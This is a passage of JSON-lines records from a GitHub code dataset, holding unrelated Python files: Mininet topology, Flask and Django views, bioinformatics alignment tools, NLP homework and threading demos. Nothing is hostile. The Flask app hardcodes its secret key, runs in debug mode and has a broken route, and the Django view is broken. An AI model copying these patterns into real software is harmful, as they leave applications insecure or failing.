0.14.\n ARROW_0_15 (2):\n Use the message format as of Apache Arrow\n Release 0.15.\n \"\"\"\n FORMAT_UNSPECIFIED = 0\n ARROW_0_14 = 1\n ARROW_0_15 = 2\n\n format_: Format = proto.Field(\n proto.ENUM,\n number=1,\n enum=Format,\n )\n\n\n__all__ = tuple(sorted(__protobuf__.manifest))\n","repo_name":"googleapis/python-bigquery-storage","sub_path":"google/cloud/bigquery_storage_v1beta2/types/arrow.py","file_name":"arrow.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"78"} +{"seq_id":"42361672880","text":"#! /usr/bin/python\n# invocare con mn --custom load-balance-topology.py --topo LBTopo\n\nfrom mininet.topo import Topo #definire la topologia\n\n\"\"\"h1 -- s1 -- s3 -- s2 -- h2\n \\ /\n \\ s4 /\n\"\"\"\nclass LBTopo ( Topo ):\n\n def build(self):\n\n #Aggiungo nuovi host\n host1= self.addHost('h1')\n host2= self.addHost('h2')\n\n #Aggiungo nuovi switch\n switch1=self.addSwitch('s1')\n switch2=self.addSwitch('s2')\n switch3=self.addSwitch('s3')\n switch4=self.addSwitch('s4')\n\n #Aggiungo i link agli switch\n #switch1\n self.addLink(switch1,host1,port1=1)\n self.addLink(switch1,switch3,port1=2)\n self.addLink(switch1,switch4,port1=3)\n\n #switch2\n self.addLink(switch2,host2,port1=1)\n self.addLink(switch2,switch3,port1=2)\n self.addLink(switch2,switch4,port1=3)\n\ntopos = { 'LBTopo' : ( lambda: LBTopo() ) }\n","repo_name":"gverticale/sdn-vm-polimi","sub_path":"sdn-lab/altri_esempi/load-balance-topology.py","file_name":"load-balance-topology.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"6279540800","text":"import flask\nimport flask_wtf\nimport flask_bootstrap\nimport form\nimport functions\nimport wtforms\n\napp = flask.Flask(__name__)\napp.config['SECRET_KEY'] = 'yyh970923' # 密钥\nbootstrap = flask_bootstrap.Bootstrap(app)\n\n\n@app.route('/')\ndef main_gui():\n return flask.render_template('MainGui.html')\n\n\n@app.route('/search')\ndef search():\n return flask.render_template('search.html')\n\n\n@app.route('/search_by_title', methods=['GET', 'POST'])\ndef search_by_title():\n form0 = form.NameForm()\n if form0.validate_on_submit(): # 数据不为空\n title = form0.data.data\n form0.data.data = ''\n else:\n return flask.render_template('search_by_title.html', form=form0, data='') # 输入为空\n data = functions.search_by_title(title)\n return flask.render_template('search_by_title.html', form=form0, data=data)\n\n\n@app.route('/search_by_author', methods=['GET', 'POST'])\ndef search_by_author():\n form0 = form.NameForm()\n if form0.validate_on_submit():\n author = form0.data.data\n form0.data.data = ''\n else:\n return flask.render_template('search_by_author.html', form=form0, data='', data_favour='')\n data, data_favour = functions.search_by_author(author)\n return flask.render_template('search_by_author.html', form=form0, data=data, data_favour=data_favour)\n\n\n@app.route('/search_by_type', methods=['GET', 'POST'])\ndef search_by_type():\n form0 = form.NameForm()\n if form0.validate_on_submit():\n thetype = form0.data.data\n form0.data.data = ''\n else:\n return flask.render_template('search_by_type.html', form=form0, data='', data_favour='')\n data, data_favour = functions.search_by_type(thetype)\n return flask.render_template('search_by_type.html', form=form0, data=data, data_favour=data_favour)\n\n\n\"\"\"\n 暂时的解决方案,试图完善通过href得到指定参数并传入表单中\n\"\"\"\n@app.route('/type/')\ndef totype(thetype):\n return thetype\n\n\n@app.route('/update')\ndef update():\n form0 = form.UpdateForm()\n if form0.validate_on_submit():\n data = form0.data\n form0.data = []\n return flask.render_template('update.html', form=form0)\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"Ronnieyang97/eleclib","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20049978852","text":"\nitems = [\"T-shirt\",\"Sweater\"]\nuser = input(\"Wellcome to our shop, what do you want (C,R,U,D)?\\n\")\nif user ==\"R\":\n print(items)\nelif user ==\"C\":\n Newitem1=input(\"Input new item:\\n\")\n items.append(Newitem1)\n print(items)\nelif user ==\"U\":\n Newposition = int(input(\"Upadate position?\\n\"))\n if Newposition <= len(items):\n # items.pop(Newposition - 1) \n Newitem2 = input(\"New item:\\n\")\n items.insert((Newposition - 1), Newitem2)\n else: \n print(\"Error.\")\n print(items)\nelif user ==\"D\":\n Newposition2 = int(input(\"The position you want to delete:\\n\"))\n if Newposition2 <= len(items):\n items.pop(Newposition2 - 1)\n print(items)\n else:\n print(\"Error.\") \n \n","repo_name":"linhptk/phamthikhanhlinh-fundamental-C4E27","sub_path":"Sesion03/HW/Serious excercise 1.py","file_name":"Serious excercise 1.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74100514506","text":"# Create a YAML file with sample data using the pyyaml library.\nimport yaml\n\nprint(\"this is code added in third-branch\")\n# code to read from sample yaml file\n# with open('sample.yaml', 'r') as file:\n# prime_service = yaml.safe_load(file)\n\n# # print(prime_service)\n# print(prime_service['rest']['port'])\nnames_for_yaml = \"\"\"\n- 'eric'\n- 'sita'\n- 'hari'\n\"\"\"\nnames = yaml.safe_load(names_for_yaml)\n\nwith open('names.yaml', 'w') as file:\n yaml.dump(names, file)\n\nprint(open('names.yaml').read())\n","repo_name":"sanjeebnepal/python-git-demo","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34230714950","text":"'''A collection of tools to handle sequence manipulation.\nPart of the biostructmap package.\n'''\nfrom __future__ import absolute_import, division, print_function\n\nfrom io import StringIO\nimport operator\nimport re\nimport subprocess\nimport tempfile\nimport warnings\nfrom Bio import AlignIO\nfrom Bio.Blast.Applications import NcbiblastpCommandline\nfrom Bio.Blast import NCBIXML\nfrom Bio.pairwise2 import align\nfrom Bio.SubsMat import MatrixInfo as matlist\nfrom Bio.Seq import Seq\n\n#Use local BLAST+ installation. Falls back to pairwise2 if False.\nLOCAL_BLAST = True\n#Use local exonerate installation to align dna to protein sequences.\n#Falls back to a basic method using either BLAST+ or pairwise2 if False,\n#but won't take into consideration introns or frameshift mutations.\nLOCAL_EXONERATE = True\n\ndef _sliding_window(seq_align, window, step=3, fasta_out=False):\n '''\n Generate a Multiple Sequence Alignment over a sliding window.\n\n Input is either filehandle, or Bio.AlignIO multiple sequence alignment\n object.\n Args:\n seq_align: A multiple sequence alignment. Either a filehandle, or\n Bio.AlignIO multiple sequence alignment object.\n window (int): Sliding window width\n step (int, optional): Step size to increment each window. Default of 3.\n fasta_out (bool): If True, output will be a fasta formatted string. If\n False, then output will be an AlignIO object.\n Yields:\n str/MultipleSequenceAlignment: The next window in the sliding window\n series for the original multiple sequence alignment.\n '''\n try:\n alignments = AlignIO.read(seq_align, 'fasta')\n except (AttributeError, ValueError):\n alignments = seq_align\n #Length of alignments\n length = len(alignments[0])\n for i in range(0, length-window, step):\n alignment = alignments[:, i:i+window]\n if fasta_out:\n alignment = alignment.format('fasta')\n yield alignment\n\ndef _sliding_window_var_sites(seq_align, window, step=3):\n '''\n Generate a Multiple Sequence Alignment over a sliding window, only\n including polymorphic sites in the alignment.\n\n Notes:\n Returns an empty MultipleSequenceAlignment object if no polymorphic\n sites are found within the window.\n\n Args:\n seq_align: A multiple sequence alignment. Either a filehandle, or\n Bio.AlignIO multiple sequence alignment object.\n window (int): Sliding window width\n step (int, optional): Step size to increment each window. Default of 3.\n fasta_out (bool): If True, output will be a fasta formatted string. If\n False, then output will be an AlignIO object.\n Yields:\n MultipleSequenceAlignment: The next window in the sliding window\n series for the original multiple sequence alignment, with\n only polymorphic sites displayed.\n '''\n try:\n alignments = AlignIO.read(seq_align, 'fasta')\n except (AttributeError, ValueError):\n alignments = seq_align\n #Length of alignments\n length = len(alignments[0])\n\n align_dict = _var_site(alignments)\n\n #Create first window\n initial_sites = {key:value for (key, value) in align_dict.items()\n if key < window}\n #Small hack to set type of 'initial_sites' variable if no alignments fall\n #within initial window\n initial_sites[-1] = alignments[:, 0:0]\n\n alignment = _join_alignments(initial_sites)\n yield alignment\n # Add/remove sites from the end/start of window as appropriate.\n for i in range(0, (length-window), step):\n for j in range(step):\n if i + j in align_dict:\n alignment = alignment[:, 1:]\n if i + j + window in align_dict:\n alignment = alignment + align_dict[i+j+window]\n yield alignment\n\n\ndef _var_site(alignment):\n '''\n Take a multiple sequence alignment object and return polymorphic sites in a\n dictionary object.\n\n This function is used to simplify the input to a tajima's D calculation.\n\n Args:\n alignment: A multiple sequence alignment object.\n\n Returns:\n dict: A dictionary containing polymorphic sites (value) accessed by\n position in the alignment (key).\n '''\n result = {}\n for i in range(len(alignment[0])):\n site = alignment[:, i]\n #Check if string contains a single character. Most efficient method\n #found so far.\n if site != len(site) * site[0]:\n result[i] = alignment[:, i:i+1]\n return result\n\ndef _join_alignments(align_dict):\n '''\n Take a dictionary of multiple sequence alignments, and join according to\n dictionary key order (generally position in sequence).\n\n Args:\n align_dict (dict): A dictionary containing single-site multiple sequence\n alignment objects accessed by position in original alignment.\n\n Returns:\n MultipleSequenceAlignment: A multiple sequence alignment object\n containing all polymorphic sites.\n '''\n output = None\n for key in sorted(align_dict):\n if not output:\n output = align_dict[key]\n else:\n output = output + align_dict[key]\n return output\n\ndef align_protein_sequences(comp_seq, ref_seq):\n '''\n Perform a pairwise alignment of two sequences.\n\n Uses BLAST+ if LOCAL_BLAST is set to True, otherwise uses Bio.pairwise2.\n\n Args:\n comp_seq (str): A comparison protein sequence.\n ref_seq (str): A reference protein sequence.\n\n Returns:\n dict: A dictionary mapping comparison sequence numbering (key) to\n reference sequence numbering (value)\n dict: A dictionary mapping reference sequence numbering (key) to\n comparison sequence numbering (value)\n '''\n if LOCAL_BLAST:\n return blast_sequences(comp_seq, ref_seq)\n else:\n return pairwise_align(comp_seq, ref_seq)\n\n\ndef align_protein_to_dna(prot_seq, dna_seq):\n '''\n Aligns a protein sequence to a genomic sequence.\n\n If LOCAL_EXONERATE flag is set to True, takes into consideration\n introns, frameshifts and reverse-sense translation if using Exonerate.\n\n If LOCAL_EXONERATE flag is set to False, then a simple translation and\n pairwise alignment is performed, and does not consider introns, frameshifts\n or reverse-sense translations.\n\n Note:\n This method uses the external program Exonerate:\n http://www.ebi.ac.uk/about/vertebrate-genomics/software/exonerate\n This needs to be installed in the users PATH.\n\n Args:\n prot_seq (str): A protein sequence.\n dna_seq (str): A genomic or coding DNA sequence\n\n Returns:\n dict: A dictionary mapping protein residue numbers to codon positions:\n e.g. {3:(6,7,8), 4:(9,10,11), ...}\n '''\n if LOCAL_EXONERATE:\n return _align_prot_to_dna_exonerate(prot_seq, dna_seq)\n else:\n return _align_prot_to_dna_no_exonerate(prot_seq, dna_seq)\n\n\n\ndef _align_prot_to_dna_no_exonerate(prot_seq, dna_seq):\n '''\n Aligns a protein sequence to a genomic sequence. Does not take consider\n introns, frameshifts or reverse-sense translation.\n If these are required, should use Exonerate method instead.\n\n Args:\n prot_seq (str): A protein sequence.\n dna_seq (str): A genomic or coding DNA sequence\n\n Returns:\n dict: A dictionary mapping protein residue numbers to codon positions:\n e.g. {3:(6,7,8), 4:(9,10,11), ...}\n '''\n #Translate DNA sequence to protein sequence\n dna_prot_seq = str(Seq(dna_seq).translate())\n #Use existing methods to align protein-protein\n prot_dna_dict, _ = align_protein_sequences(prot_seq, dna_prot_seq)\n #Convert output to protein: codon dict\n protein_to_codons = {key: (value*3-2, value*3-1, value*3) for\n key, value in prot_dna_dict.items()}\n return protein_to_codons\n\ndef pairwise_align(comp_seq, ref_seq):\n '''\n Perform a pairwise alignment of two sequences.\n\n Uses the BioPython pairwise2 module with the BLOSUM62 matrix for scoring\n similarity. Gap opening penalty is -11 and gap extend penalty is -1,\n which is the same as the default blastp parameters.\n\n Output is two dictionaries: residue numbering in PDB chain (key) mapped to\n the residue position in the reference sequence (value), and vice versa.\n\n Args:\n comp_seq (str): A comparison protein sequence.\n ref_seq (str): A reference protein sequence.\n\n Returns:\n dict: A dictionary mapping comparison sequence numbering (key) to\n reference sequence numbering (value)\n dict: A dictionary mapping reference sequence numbering (key) to\n comparison sequence numbering (value)\n '''\n alignment = align.globalds(comp_seq, ref_seq, matlist.blosum62, -11, -1,\n penalize_end_gaps=False, one_alignment_only=True)[0]\n query_string = alignment[0]\n sbjct_string = alignment[1]\n #Create dictionary mapping position in PDB chain to position in ref sequence\n pdb_to_ref = {}\n ref_to_pdb = {}\n key = 1\n ref = 1\n for i, res in enumerate(query_string):\n if res.isalpha() and sbjct_string[i].isalpha():\n pdb_to_ref[key] = ref\n ref_to_pdb[ref] = key\n key += 1\n ref += 1\n elif res.isalpha():\n key += 1\n elif sbjct_string[i].isalpha():\n ref += 1\n return pdb_to_ref, ref_to_pdb\n\ndef blast_sequences(comp_seq, ref_seq):\n '''\n Perform BLAST of two protein sequences using NCBI BLAST+ package.\n\n Output is two dictionaries: residue numbering in PDB chain (key) mapped to\n the residue position in the reference sequence (value), and vice versa.\n\n Notes:\n User must have NCBI BLAST+ package installed in user's PATH.\n\n Args:\n comp_seq (str): A comparison protein sequence.\n ref_seq (str): A reference protein sequence.\n\n Returns:\n dict: A dictionary mapping comparison sequence numbering (key) to\n reference sequence numbering (value)\n dict: A dictionary mapping reference sequence numbering (key) to\n comparison sequence numbering (value)\n '''\n with tempfile.NamedTemporaryFile(mode='w') as comp_seq_file, \\\n tempfile.NamedTemporaryFile(mode='w') as ref_seq_file:\n comp_seq_file.write(\">\\n\" + str(comp_seq) + \"\\n\")\n ref_seq_file.write(\">\\n\" + str(ref_seq) + \"\\n\")\n ref_seq_file.flush()\n comp_seq_file.flush()\n blastp_cline = NcbiblastpCommandline(query=comp_seq_file.name,\n subject=ref_seq_file.name,\n evalue=0.001, outfmt=5)\n alignment, _stderror = blastp_cline()\n blast_xml = StringIO(alignment)\n blast_record = NCBIXML.read(blast_xml)\n temp_score = 0\n high_scoring_hsp = None\n #Retrieve highest scoring HSP\n for alignment in blast_record.alignments:\n for hsp in alignment.hsps:\n if hsp.score > temp_score:\n temp_score = hsp.score\n high_scoring_hsp = hsp\n #Create dictionary mapping position in PDB chain to position in ref sequence\n pdb_to_ref = {}\n ref_to_pdb = {}\n if high_scoring_hsp is not None:\n query_string = high_scoring_hsp.query\n sbjct_string = high_scoring_hsp.sbjct\n key = high_scoring_hsp.query_start\n ref = high_scoring_hsp.sbjct_start\n for i, res in enumerate(query_string):\n if res.isalpha() and sbjct_string[i].isalpha():\n pdb_to_ref[key] = ref\n ref_to_pdb[ref] = key\n key += 1\n ref += 1\n elif res.isalpha():\n key += 1\n elif sbjct_string[i].isalpha():\n ref += 1\n return pdb_to_ref, ref_to_pdb\n\n\ndef _construct_sub_align_from_chains(alignments, codons, fasta=False):\n '''\n Take a list of biostructmap multiple sequence alignment objects, and\n return a subset of codons based on an input list in the form\n [('A',(1,2,3)),('B',(4,5,6)),...].\n\n Notes:\n Codons should be 1-indexed, not 0-indexed.\n\n Args:\n alignment (dict): A dictionary of multiple sequence alignment objects\n accessed by a tuple of chain ids for each alignment.\n codons (list): a subset of codons in a list of the form [(1,2,3),...]\n fasta (bool, optional): If True, will return multiple sequence\n alignment as a string in FASTA format.\n\n Returns:\n MulitpleSequenceAlignment: A subset of the initial alignment as a\n multiple sequence alignment object. If the fasta kwarg is set to\n True, returns a string instead.\n '''\n chain_alignments = {}\n chain_strains = {}\n for key, alignment in alignments.items():\n chain_alignments[key] = alignment.get_alignment_position_dict()\n chain_strains[key] = alignment.get_isolate_ids()\n codons = [(chain_id, x) for chain_id, sublist in codons for x in sublist]\n sub_align = []\n for codon in codons:\n #List is zero indexed, hence the need to call codon-1\n sub_align.append(list(chain_alignments[codon[0]][codon[1]-1]))\n _sub_align_transpose = zip(*sub_align)\n sub_align_transpose = [''.join(x) for x in _sub_align_transpose]\n if fasta:\n strains = list(chain_strains.values())[0]\n if sub_align_transpose:\n fasta_out = ''.join('>{}\\n{}\\n'.format(*t) for t in\n zip(strains, sub_align_transpose))\n else:\n fasta_out = ''.join('>{}\\n\\n'.format(strain) for strain in strains)\n return fasta_out\n return sub_align_transpose\n\ndef _construct_protein_sub_align_from_chains(alignments, residues, fasta=False):\n '''\n Take a list of biostructmap multiple sequence alignment objects, and\n return a subset of residues based on an input list in the form\n [('A', 1), ('B', 4), ...].\n\n Notes:\n Residues should be 1-indexed, not 0-indexed.\n\n Args:\n alignment (dict): A dictionary of multiple sequence alignment objects\n accessed by a tuple of chain ids for each alignment.\n residues (list): a subset of codons in a list of the form [(1,2,3),...]\n fasta (bool, optional): If True, will return multiple sequence\n alignment as a string in FASTA format.\n\n Returns:\n MulitpleSequenceAlignment: A subset of the initial alignment as a\n multiple sequence alignment object. If the fasta kwarg is set to\n True, returns a string instead.\n '''\n chain_alignments = {}\n chain_strains = {}\n for key, alignment in alignments.items():\n chain_alignments[key] = alignment.get_alignment_position_dict()\n chain_strains[key] = alignment.get_isolate_ids()\n sub_align = []\n for residue in residues:\n #List is zero indexed, hence the need to call codon-1\n sub_align.append(list(chain_alignments[residue[0]][residue[1]-1]))\n _sub_align_transpose = zip(*sub_align)\n sub_align_transpose = [''.join(x) for x in _sub_align_transpose]\n if fasta:\n strains = list(chain_strains.values())[0]\n if sub_align_transpose:\n fasta_out = ''.join('>{}\\n{}\\n'.format(*t) for t in\n zip(strains, sub_align_transpose))\n else:\n fasta_out = ''.join('>{}\\n\\n'.format(strain) for strain in strains)\n return fasta_out\n return sub_align_transpose\n\ndef _construct_sub_align(alignment, codons, fasta=False):\n '''\n Take a biostructmap multiple sequence alignment object, and return a\n subset of codons based on an input list in the form [(1,2,3),(4,5,6),...].\n\n Notes:\n Codons should be 1-indexed, not 0-indexed.\n\n Args:\n alignment: A multiple sequence alignment object.\n codons (list): a subset of codons in a list of the form [(1,2,3),...]\n fasta (bool, optional): If True, will return multiple sequence\n alignment as a string in FASTA format.\n\n Returns:\n MulitpleSequenceAlignment: A subset of the initial alignment as a\n multiple sequence alignment object. If the fasta kwarg is set to\n True, returns a string instead.\n '''\n alignments = alignment.get_alignment_position_dict()\n strains = alignment.get_isolate_ids()\n codons = [x for sublist in codons for x in sublist]\n sub_align = []\n for codon in codons:\n #List is zero indexed, hence the need to call codon-1\n sub_align.append(list(alignments[codon-1]))\n _sub_align_transpose = zip(*sub_align)\n sub_align_transpose = [''.join(x) for x in _sub_align_transpose]\n if fasta:\n fasta_out = ''.join('>{}\\n{}\\n'.format(*t) for t in\n zip(strains, sub_align_transpose))\n return fasta_out\n return sub_align_transpose\n\ndef check_for_uncertain_bases(alignment):\n '''\n Check for uncertain or missing base pairs in a multiple sequence alignment.\n\n Args:\n alignment (list): A multiple sequence alignment as a list of sequence\n strings.\n Returns:\n bool: True if alignment contains bases other than A, C, G or T.\n '''\n accepted_bases = 'ACGTacgt'\n for sequence in alignment:\n for base in sequence:\n if base not in accepted_bases:\n warnings.warn(\"Multiple sequence alignment contains uncertain \"\\\n \"or missing bases: using DendroPy implementation of population \"\\\n \"statistics, which is slower. Also, DendroPy treatment of uncertain \"\\\n \"bases is not guaranteed to be correct, and it suggested the user filter \"\\\n \"out uncertain bases before running BioStructMap.\")\n return True\n return False\n\ndef _align_prot_to_dna_exonerate(prot_seq, dna_seq):\n '''\n Aligns a protein sequence to a genomic sequence. Takes into consideration\n introns, frameshifts and reverse-sense translation.\n\n Note:\n This method uses the external program Exonerate:\n http://www.ebi.ac.uk/about/vertebrate-genomics/software/exonerate\n This needs to be installed in the users PATH.\n\n Args:\n prot_seq (str): A protein sequence.\n dna_seq (str): A genomic or coding DNA sequence\n\n Returns:\n dict: A dictionary mapping protein residue numbers to codon positions:\n e.g. {3:(6,7,8), 4:(9,10,11), ...}\n '''\n #TODO Use Biopython exonerate parser. Didn't realise that existed when I wrote this parser.\n with tempfile.NamedTemporaryFile(mode='w') as protein_seq_file, \\\n tempfile.NamedTemporaryFile(mode='w') as dna_seq_file:\n protein_seq_file.write(\">\\n\" + prot_seq + \"\\n\")\n dna_seq_file.write(\">\\n\" + dna_seq + \"\\n\")\n dna_seq_file.flush()\n protein_seq_file.flush()\n #If protein sequence length is small, then exonerate score needs\n #to be adjusted in order to return alignment.\n #With a length n, a perfect match would score 5n.\n #Hence we make a threshold of 3n (60%).\n exonerate_call = [\"exonerate\",\n \"--model\", \"protein2genome\",\n \"--showalignment\", \"False\",\n \"--showvulgar\", \"True\",\n protein_seq_file.name,\n dna_seq_file.name]\n if len(prot_seq) < 25:\n threshold = str(len(prot_seq) * 3)\n exonerate_call.append(\"--score\")\n exonerate_call.append(threshold)\n alignment = subprocess.check_output(exonerate_call)\n vulgar_re = re.search(r\"(?<=vulgar:).*(?=\\n)\",\n alignment.decode(\"utf-8\"))\n if not vulgar_re:\n raise UserWarning(\"Did not find exonerate alignment.\")\n vulgar_format = vulgar_re.group(0)\n protein_start = vulgar_format.split()[0]\n dna_start = vulgar_format.split()[3]\n matches = vulgar_format.split()[7:]\n direction = vulgar_format.split()[5]\n protein_count = int(protein_start)\n dna_count = int(dna_start)\n\n if direction == \"+\":\n step = operator.add\n elif direction == \"-\":\n step = operator.sub\n dna_count += 1\n else:\n raise UserWarning(\"Exonerate direction doesn't match either '+' or '-'\")\n\n if len(matches) % 3:\n raise UserWarning(\"The vulgar output from exonerate has failed \\\n to parse correctly\")\n #Split output into [modifier, query_count, ref_count] triples\n matches = [matches[i*3:i*3+3] for i in range(len(matches)//3)]\n matched_bases = {}\n\n codon = []\n\n #Convert vulgar format to dictionary with residue: codon pairs\n for region in matches:\n modifier = region[0]\n count1 = int(region[1])\n count2 = int(region[2])\n if modifier == 'M':\n if count1 != count2 / 3:\n raise UserWarning(\"Match in vulgar output is possibly \" +\n \"incorrect - number of protein residues \" +\n \"should be the number of bases divided by 3\")\n for _ in range(count2):\n dna_count = step(dna_count, 1)\n codon.append(dna_count)\n if len(codon) == 3:\n protein_count += 1\n matched_bases[protein_count] = tuple(codon)\n codon = []\n if modifier == 'C':\n if count1 != count2 / 3:\n raise UserWarning(\"Codon in vulgar output is possibly \" +\n \"incorrect - number of protein residues \" +\n \"should be the number of bases divided by 3\")\n raise UserWarning(\"Unexpected output in vulgar format - not \" +\n \"expected to need functionality for 'codon' \" +\n \"modifier\")\n if modifier == 'G' or modifier == 'N':\n if codon:\n raise UserWarning(\"Warning - split codon over gap in \" +\n \"exonerate output!\")\n protein_count = protein_count + count1\n dna_count = step(dna_count, count2)\n if modifier == '5' or modifier == '3':\n if count1 != 0:\n raise UserWarning(\"Warning - protein count should be 0 in \" +\n \"exonerate output over intron splice sites.\")\n dna_count = step(dna_count, count2)\n if modifier == 'I':\n if count1 != 0:\n raise UserWarning(\"Warning - protein count should be 0 in \" +\n \"exonerate output over intron.\")\n dna_count = step(dna_count, count2)\n if modifier == 'S':\n for _ in range(count2):\n dna_count = step(dna_count, 1)\n codon.append(dna_count)\n if len(codon) == 3:\n protein_count += 1\n matched_bases[protein_count] = tuple(codon)\n codon = []\n if modifier == 'F':\n raise UserWarning(\"Unexpected frameshift in exonerate output - \" +\n \"check alignment input.\")\n\n return matched_bases\n","repo_name":"andrewguy/biostructmap","sub_path":"biostructmap/seqtools.py","file_name":"seqtools.py","file_ext":"py","file_size_in_byte":23316,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"81"} +{"seq_id":"2000326525","text":"\"\"\"\r\ndacc_homework_2.py\r\nauthor: Hiteshi Shah (hss7374)\r\ndate: 9/23/2018\r\n\"\"\"\r\n\r\nimport nltk\r\nimport statistics\r\nimport re\r\nfrom nltk.parse import stanford\r\nimport os\r\n\r\njava_path = \"C:/Program Files/Java/jdk1.8.0_102/bin/java.exe\"\r\nos.environ['JAVAHOME'] = java_path\r\nos.environ['STANFORD_PARSER'] ='C:\\\\Users\\\\hites\\\\Documents\\\\Data Analytics Cognitive Comp\\\\stanford-parser'\r\nos.environ['STANFORD_MODELS'] ='C:\\\\Users\\\\hites\\\\Documents\\\\Data Analytics Cognitive Comp\\\\stanford-parser'\r\n\r\nprefixes = \"(1|www|_a_|A|E|H|L|M|T|W|PGDP|Fig|Figs)[.]\"\r\nverb_tags = ['VB', 'VBD', 'VBN', 'VBP', 'VBZ']\r\n\r\ndef pos_tagging(sentence):\r\n print(\"Tags:\", nltk.pos_tag(nltk.word_tokenize(sentence)))\r\n\r\n sp = stanford.StanfordParser()\r\n trees = [tree for tree in sp.parse(sentence.split())]\r\n t = nltk.tree.Tree.fromstring(str(trees[0]))\r\n for rule in t.productions():\r\n st = rule.unicode_repr()\r\n expr = st.split(\"->\")\r\n if expr[0] not in dt.keys():\r\n dt[expr[0]] = [expr[1]]\r\n else:\r\n if expr[1] not in dt[expr[0]]:\r\n dt[expr[0]].append(expr[1])\r\n else:\r\n repeating_patterns.append(expr[0] + \" -> \" + expr[1])\r\n\r\ndef sentence_length(txt):\r\n print(txt + \":\")\r\n file_name = open(txt, encoding='utf-8')\r\n file = file_name.read()\r\n\r\n file = re.sub(prefixes, \"555\\n\", file)\r\n pat = re.compile(r'([A-Z][^\\.!?]*[\\.!?])', re.M)\r\n sentences = pat.findall(file)\r\n sentence_lengths = {}\r\n for sentence in sentences:\r\n if re.search(r'[0-9]\\n', sentence) == None:\r\n sentence = \" \".join(sentence.split())\r\n if sentence.count(' ') >= 2:\r\n tags = nltk.pos_tag(nltk.word_tokenize(sentence))\r\n flag = False\r\n for tag in tags:\r\n if tag[1] in verb_tags:\r\n flag = True\r\n break\r\n if flag:\r\n sentence_lengths[sentence] = len(sentence)\r\n\r\n sentences = list(sentence_lengths.keys())\r\n lengths = list(sentence_lengths.values())\r\n max_length = max(lengths)\r\n min_length = min(lengths)\r\n max_length_sentence = sentences[lengths.index(max_length)]\r\n min_length_sentence = sentences[lengths.index(min_length)]\r\n mean_sentence_length = statistics.mean(lengths)\r\n stdev_sentence_length = statistics.stdev(lengths)\r\n\r\n print(\"Mean Sentence Length: \" + str(mean_sentence_length))\r\n print(\"Stdev Sentence Length: \" + str(stdev_sentence_length))\r\n print(\"Max Length: \" + str(max_length))\r\n print(\"Longest Sentence: \" + max_length_sentence)\r\n\r\n pos_tagging(max_length_sentence)\r\n\r\n print(\"Min Length: \" + str(min_length))\r\n print(\"Shortest Sentence: \" + min_length_sentence)\r\n\r\n pos_tagging(min_length_sentence)\r\n\r\ndef main():\r\n global dt\r\n dt = {}\r\n global repeating_patterns\r\n repeating_patterns = []\r\n file_names = ['17170-0', 'pg17606', 'Vegetius']\r\n for txt in file_names:\r\n sentence_length(txt + '.txt')\r\n print()\r\n\r\n print(\"Patterns that repeat in all three trees:\")\r\n for pattern in repeating_patterns:\r\n print(pattern, end=', ')\r\n\r\n print()\r\n print(\"\\nCFG for the parse trees of the three longest sentences:\")\r\n for key in dt:\r\n v = \" |\".join(dt[key])\r\n print(key, ' -> ', v)\r\n\r\nmain()","repo_name":"hiteshishah/DACC","sub_path":"DACC_Homework_2.py","file_name":"DACC_Homework_2.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18093159984","text":"from django.shortcuts import render\nfrom .forms import ResidenciaForm\n\n# Create your views here.\ndef add_res(response):\n if response.method == \"POST\":\n form = ResidenciaForm(response.POST)\n if form.is_valid():\n form.save()\n return redirect(\"/residencia_añadida\")\n else:\n form = ResidenciaForm()\n return render (request, \"alojamientos/añadir.html\", {\"form\":form})\n #if response.user.is_authenticated:\n\n #else:\n # return redirect(\"usuario/register.html\")\n","repo_name":"StephanieBarbitta/Alojamientos---bit","sub_path":"alojamientos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39684635970","text":"#使用互斥锁---解决变量共享问题\n\nfrom threading import Thread,Lock #Lock锁模块\n\n\ng_num = 0\n\ndef test1():\n global g_num\n locktest.acquire() # 上锁 #当test1上锁后,test2后sleep\n for i in range(10000000):\n g_num+=1\n print(\"test1= %d\" %g_num)\n locktest.release() #解锁 #当test1解锁后,会 通知 其它线程\ndef test2():\n global g_num\n locktest.acquire() # 上锁\n for i in range(10000000):\n g_num+=1\n print(\"test2= %d\" % g_num)\n locktest.release() #解锁\nlocktest = Lock() #创建一把互斥锁\n\n\np1 = Thread(target=test1)\n\n\np2 = Thread(target=test2)\n\np1.start()\n##time.sleep(1)\np2.start()\n\n#test1和test2 无论那方先执行,只要上锁后,另一方只能卡着,等待开锁后,才能执行另一个\n","repo_name":"weilink025/python3x-learnning","sub_path":"python大佬炮制/系统编程/线程/4-互斥锁---解决线程共享全局变量的问题.py","file_name":"4-互斥锁---解决线程共享全局变量的问题.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"329403442","text":"import psycopg2\nimport config as c\nimport numpy as np\nimport time\nimport json\nfrom scipy.special import expit\n\n\nclass Face:\n def __init__(self):\n self.conn = psycopg2.connect(\"dbname=\" + c.config[\"Db\"][\"dbname\"] + \" host=\" + c.config[\"Db\"][\"Host\"] + \" port=\" + c.config[\"Db\"][\"Port\"])\n self.cur = self.conn.cursor()\n\n def get_feature_repo(self):\n self.cur.execute(\"SELECT id,name,feature,face_img FROM \" + c.config[\"Db\"][\"table\"] + \" WHERE status=0\")\n self.repo = self.cur.fetchall()\n\n def match(self, na, score=0.85):\n # Cache 